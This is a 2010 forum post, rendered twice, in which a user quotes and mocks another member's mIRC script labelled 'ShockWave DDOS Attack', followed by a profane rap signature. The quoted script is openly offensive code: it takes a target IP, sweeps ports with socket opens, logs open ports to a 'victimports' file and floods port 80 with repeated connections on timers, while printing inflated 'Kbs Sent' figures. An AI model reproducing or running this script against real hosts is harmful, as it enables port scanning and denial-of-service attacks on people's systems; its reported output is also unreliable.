View Single Post
  #6  
Unread 10-07-2010, 01:51 PM
Louie Dawgs
Join Date: Jun 2009
Posts: 4,746
Mentioned: 121 Post(s)
Tagged: 5 Thread(s)
Send a message via MSN to Louie Dawgs
Estimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 7.54/10 starsEstimated Skill in Text: 7.54/10 starsEstimated Skill in Text: 7.54/10 stars
Ranked Text Record
48 Won / 30 Lost
Default

Quote:
Originally Posted by C Teezy View Post
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1

}
on 1:dialogDOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
Lawl.

tl:dr

is this a telnet attack? zomg.
__________________
Yes Yes Ya'll, an it don't stop....

Seems like me an' you bout had enough,
Cause man, it's tough to keep the fam in touch,
And to add it up, this rappin stuff got me flippin out like a blackjack bust

Don't give a fuck if you sound like Master P, Mobb Deep or Remy Martin,
Cuz even if the next to try us is the best of rhymers?
Still get bodied on plates like Jeffery Dahmer
Reply With Quote
Unread 10-07-2010, 01:51 PM   #6
 
Louie Dawgs
Estimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 6.88/10 starsEstimated Skill in Text: 7.54/10 starsEstimated Skill in Text: 7.54/10 starsEstimated Skill in Text: 7.54/10 stars
Ranked Text Record
48 Won / 30 Lost
 
Join Date: Jun 2009
Voted: 0 audio / 211 text
Posts: 4,746
Mentioned: 121 Post(s)
Tagged: 5 Thread(s)


Send a message via MSN to Louie Dawgs
Default

Quote:
Originally Posted by C Teezy View Post
alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1

}
on 1:dialogDOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}
Lawl.

tl:dr

is this a telnet attack? zomg.
__________________
Yes Yes Ya'll, an it don't stop....

Seems like me an' you bout had enough,
Cause man, it's tough to keep the fam in touch,
And to add it up, this rappin stuff got me flippin out like a blackjack bust

Don't give a fuck if you sound like Master P, Mobb Deep or Remy Martin,
Cuz even if the next to try us is the best of rhymers?
Still get bodied on plates like Jeffery Dahmer
Offline  
Reply With Quote